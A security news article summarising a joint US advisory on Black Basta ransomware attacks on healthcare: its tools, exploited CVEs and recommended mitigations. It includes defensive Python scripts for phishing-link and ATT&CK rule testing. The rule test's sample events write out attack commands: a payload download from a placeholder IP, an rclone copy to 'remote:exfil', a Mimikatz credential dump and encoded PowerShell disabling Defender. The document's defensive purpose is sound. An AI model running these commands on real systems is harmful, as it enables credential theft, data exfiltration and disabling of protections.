Exclusive Insights: Joint Advisory Sheds Light on BlackBasta Ransomware's Healthcare Attacks

Ransomware attacks have become a critical threat to the healthcare industry, affecting patient care, data security, and operational continuity. The February 2024 attack on UnitedHealth's Change Healthcare subsidiary showed how attractive healthcare organizations and their data are to attackers, and how damaging the consequences can be for patients and clinicians. The ALPHV/BlackCat group was behind that attack and reportedly received a Bitcoin payment worth about $22m.

Another notable ransomware group targeting the healthcare sector is Black Basta. According to researchers at Kaspersky, it was the 12th most active ransomware family in 2023. The gang remains one of the most prolific operations in the ransomware landscape, having targeted more than 500 organizations over the past two years, healthcare providers among them, according to a joint advisory issued by US federal agencies and the MS-ISAC.

Insight from the Joint Cybersecurity Advisory

To combat the escalating threat posed by ransomware, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Cybersecurity Advisory (CSA) on May 10, 2024 that details Black Basta's tactics, techniques, and procedures. The joint authorship reflects a coordinated effort by these organizations to harden defenses against the group.

The alert was issued days after a ransomware attack on Ascension, a major healthcare provider, disrupted critical services and systems across its 140 hospitals in 19 states. The advisory describes Black Basta as a ransomware-as-a-service (RaaS) operation whose affiliates impacted more than 500 organizations, including critical infrastructure entities, in North America, Europe, and Australia between April 2022 and May 2024. The group has encrypted and stolen data from organizations in at least 12 of the 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) sector.

Healthcare organizations are especially attractive targets for cybercriminals because of their size, their dependence on technology, and the volume of personal health information they hold. Like many other ransomware operations, Black Basta affiliates gain initial access by exploiting known vulnerabilities or through phishing. Some researchers have also reported affiliates using Qakbot infections for initial access.

The advisory also notes that since February 2024 affiliates have been exploiting CVE-2024-1709, a critical authentication-bypass vulnerability in ConnectWise ScreenConnect with a CVSS score of 10.0. Researchers from Trend Micro have likewise linked Black Basta to exploitation of this flaw.

After gaining initial access, affiliates use a range of off-the-shelf tools: the SoftPerfect Network Scanner for network discovery, and BITSAdmin, Remote Desktop Protocol (RDP), and PsExec for lateral movement. Researchers have also observed some affiliates relying on Cobalt Strike beacons, ScreenConnect, and Splashtop for lateral movement and remote access.

The operation follows the double-extortion model: data is exfiltrated before the files are encrypted. Affiliates use Mimikatz to scrape credentials for privilege escalation and RClone for data exfiltration. They also escalate privileges by exploiting known Windows and Active Directory flaws such as NoPac (CVE-2021-42278 and CVE-2021-42287), PrintNightmare (CVE-2021-34527), and ZeroLogon (CVE-2020-1472).

Prior to exfiltration, researchers have observed affiliates using PowerShell to disable antivirus products, and in some cases deploying a tool called Backstab that disables endpoint detection and response (EDR) agents. Once those protections are terminated, the ransomware encrypts files with the ChaCha20 algorithm, with the symmetric keys protected by the operators' RSA-4096 public key so that only the holder of the matching private key can recover them, and leaves a ransom note on the compromised systems.

Recommendations for HealthCare Organizations

The authoring organizations recommend that all organizations and cybersecurity professionals implement mitigations aligned with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and NIST. Following these practices improves an organization's overall security posture and reduces the likelihood and impact of a ransomware attack. The mitigations include the following:

  • Update firmware, software, and operating systems as soon as new versions are released.

  • Install modern anti-malware software and keep its signatures current.

  • Implement phishing-resistant multi-factor authentication (MFA) for as many services as possible.

  • Validate a link's destination before clicking by hovering over it and checking that the URL shown matches the link's text.

  • Healthcare organizations should ensure that electronic protected health information (ePHI) is secured and handled in compliance with HIPAA.

  • Identify critical business assets using active scans, passive discovery, or a combination of both.

  • Identify, evaluate, and prioritize vulnerabilities across the environment so they can be remediated in a timely manner. Use the Common Vulnerability Scoring System (CVSS) to rank severity, and treat vulnerabilities known to be exploited in the wild (for example, those listed in CISA's Known Exploited Vulnerabilities catalog) as the top priority regardless of score.
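The "hover and compare" advice above is something a mail gateway or a user-awareness tool can automate. The following Python script is an added example, not code from the advisory or its authors: it parses the anchors in an HTML message body and flags links whose visible text is a URL for a different host than the real `href`, plus links that point at a bare IP address. The message body is constructed for this example, and the hostnames in it are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message body for illustration (not from any real campaign).
SAMPLE_HTML = """
<p>Your account needs attention.</p>
<a href="https://login.example-portal.net/reset">https://portal.example.com/reset</a>
<a href="https://portal.example.com/help">Help center</a>
<a href="http://203.0.113.5/invoice">Click here</a>
<a href="https://mail.example.com/">mail.example.com</a>
"""

# Visible text that a user would read as a web address (with or without scheme).
_HOSTLIKE = re.compile(r"^(?:https?://)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:[/?#].*)?$")
_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}$")


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_anchors(html):
    parser = _AnchorCollector()
    parser.feed(html)
    parser.close()
    return parser.anchors


def host_of(url):
    """Lower-cased hostname of a URL; scheme-less text is treated as http://."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def find_suspicious_links(html):
    """Return one finding per anchor whose displayed text misrepresents its target."""
    findings = []
    for href, text in extract_anchors(html):
        href_host = host_of(href)
        if _HOSTLIKE.match(text) and host_of(text) != href_host:
            findings.append({"href": href, "text": text,
                             "reason": "displayed URL host differs from actual link host"})
        elif _IPV4.match(href_host):
            findings.append({"href": href, "text": text,
                             "reason": "link target is a bare IP address"})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_links(SAMPLE_HTML):
        print(f"{f['reason']}: text={f['text']!r} href={f['href']!r}")
```

On the sample body the first and third links are flagged; the "Help center" link and the `mail.example.com` link (whose text and target agree) pass. The comparison is on the full hostname, so a lookalike domain such as `example-portal.net` is caught even when the rest of the URL is copied faithfully.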

Beyond these measures, the authoring organizations recommend that organizations test and validate their security programs on a continuing basis to see how their controls actually perform against the MITRE ATT&CK techniques listed in the advisory, rather than assuming a control works because it is deployed.

To get started with testing, follow the steps below:

  1. Select an ATT&CK technique from the table in the advisory.

  2. Align your security technologies against the chosen technique.

  3. Test your technologies against that technique.

  4. Analyze how your detection and prevention technologies performed.

  5. Repeat the process for all security technologies to build a comprehensive set of performance data.

  6. Tune your security program based on the data this process generates.
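As an added example (not from the advisory or the authoring agencies), the following Python script runs the loop above over constructed process-creation events. A handful of illustrative rules for the tooling named earlier in this article (SoftPerfect Network Scanner, BITSAdmin, PsExec, PowerShell disabling Defender, Mimikatz, RClone), each tagged with the ATT&CK technique ID it is meant to detect, are applied to sample events, and the result is summarised as per-technique coverage. Host names, user names, paths, and the regex patterns are assumptions made for this example; RDP (T1021.001) is deliberately left without a rule so the coverage report shows a gap, since RDP lateral movement is better detected from logon events than from process creation.

```python
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str   # MITRE ATT&CK technique ID the rule is meant to detect
    name: str
    pattern: str     # regex applied to the normalised image + command line


# Illustrative process-creation rules for the tooling named in the advisory.
# Technique IDs follow MITRE ATT&CK; the patterns are this example's own,
# not vendor signatures, and would need tuning before production use.
RULES = [
    Rule("T1046",     "SoftPerfect Network Scanner",        r"\bnetscan(\.exe)?\b"),
    Rule("T1197",     "BITSAdmin transfer job",             r"\bbitsadmin(\.exe)?\b.*/transfer\b"),
    Rule("T1569.002", "PsExec remote service execution",    r"\bpsexec(64)?(\.exe)?\b"),
    Rule("T1562.001", "Defender real-time protection off",  r"set-mppreference\b.*-disablerealtimemonitoring\s+(\$true|1)\b"),
    Rule("T1003.001", "Mimikatz LSASS credential dump",     r"\bmimikatz\b|sekurlsa::logonpasswords"),
    Rule("T1567.002", "RClone copy/sync to remote storage", r"\brclone(\.exe)?\b.*\b(copy|sync)\b"),
]

# Techniques the exercise is scoped to. RDP (T1021.001) has no rule above on
# purpose, so the coverage report exposes the gap.
ADVISORY_TECHNIQUES = ["T1046", "T1197", "T1021.001", "T1569.002",
                       "T1562.001", "T1003.001", "T1567.002"]

# powershell.exe accepts -e, -ec, -enc or -EncodedCommand followed by a base64
# UTF-16LE script; the rules must see the decoded body, not the wrapper.
_ENC_ARG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def _encode_ps(script: str) -> str:
    """Wrap a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (hypothetical hosts, users and paths) in the shape
# a Sysmon/EDR process-creation record is usually normalised to.
SAMPLE_EVENTS = [
    {"host": "WS01",  "user": "jdoe",   "image": r"C:\Users\jdoe\Downloads\netscan.exe",
     "command_line": r"netscan.exe /hide /auto:scan.xml"},
    {"host": "WS01",  "user": "jdoe",   "image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"host": "WS01",  "user": "jdoe",   "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + _encode_ps("Set-MpPreference -DisableRealtimeMonitoring $true")},
    {"host": "SRV02", "user": "svc_bk", "image": r"C:\Temp\mimikatz.exe",
     "command_line": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "SRV02", "user": "svc_bk", "image": r"C:\Temp\PsExec64.exe",
     "command_line": r"PsExec64.exe \\10.0.0.20 -s cmd.exe"},
    {"host": "WS01",  "user": "jdoe",   "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/u.exe C:\Temp\u.exe"},
    {"host": "SRV02", "user": "svc_bk", "image": r"C:\Temp\rclone.exe",
     "command_line": r"rclone.exe copy D:\Shares\Finance remote:exfil --transfers 8"},
    {"host": "WS02",  "user": "asmith", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-MpPreference"},
]


def normalise(image: str, command_line: str) -> str:
    """Lower-case the event text and append the decoded body of any
    -EncodedCommand argument so base64-wrapped PowerShell is visible."""
    text = f"{image} {command_line}"
    for m in _ENC_ARG.finditer(command_line):
        try:
            text += " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 / not UTF-16LE: leave the raw text alone
    return text.lower()


def detect(events):
    """Apply every rule to every event; one hit per (event, rule) match."""
    compiled = [(r, re.compile(r.pattern, re.IGNORECASE)) for r in RULES]
    hits = []
    for idx, ev in enumerate(events):
        text = normalise(ev["image"], ev["command_line"])
        for rule, rx in compiled:
            if rx.search(text):
                hits.append({"event": idx, "host": ev["host"], "user": ev["user"],
                             "technique": rule.technique, "rule": rule.name})
    return hits


def coverage(hits, techniques):
    """Map each in-scope technique to whether at least one rule fired for it."""
    seen = {h["technique"] for h in hits}
    return {t: t in seen for t in techniques}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"event {h['event']:>2} {h['host']:<6} {h['technique']:<10} {h['rule']}")
    for tech, ok in coverage(found, ADVISORY_TECHNIQUES).items():
        print(f"{tech:<10} {'covered' if ok else 'GAP: no rule fired'}")
```

Running it prints one line per hit (six of the eight events, the two benign ones stay silent) and then one line per technique; the empty slot for T1021.001 is exactly the kind of finding step 6 is about, and the fix is a logon-based rule (Windows event 4624 with logon type 10), not another process-creation pattern. The encoded-command handling matters as well: a rule that only inspects the raw command line never sees the Set-MpPreference call, so the Defender-tampering event would be scored as a miss.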

Black Basta Ransomware: An Overview

Black Basta is a ransomware variant and Ransomware-as-a-Service (RaaS) operation that first appeared in early 2022. Although it is relatively new on the cybercrime scene, it has quickly established itself as one of the most active RaaS threat actors worldwide, known for its well-developed tradecraft and high success rate.

According to Malwarebytes, the group was linked with 28 of the 373 confirmed ransomware attacks in April 2024.

Black Basta is believed to be closely affiliated with the Conti group because of similarities in its malware development, its leak site, and the way it communicates with victims during payment negotiation and data recovery. The group has targeted organizations in financial services, healthcare, government, education, and media across the globe. In October 2023 the Toronto Public Library, Canada's largest public library system, fell victim to the gang; the attack disrupted library services, including access to digital resources, patron information, and other essential functions. Similarly, the same group attacked the UK outsourcing giant and public service specialist Capita in March 2023. The incident cost Capita an estimated £15m to £20m in exceptional costs and left its clients, many of them public-sector bodies, without vital services for days.

The group relies on double extortion: it encrypts the victim's data and threatens to publish the stolen copy online if its demands are not met. In its early campaigns, Black Basta used email and spear-phishing to gain initial access and deploy ransomware on the target's systems. The gang has also used other techniques to increase the impact of its deployments, such as disabling DNS on compromised systems to complicate recovery, and it operates a ransomware variant that targets Linux-based VMware ESXi virtual machines (VMs). It maintains a public leak site where it names victims and publishes samples of stolen data to pressure them into paying; victims who refuse risk having their sensitive information exposed there.
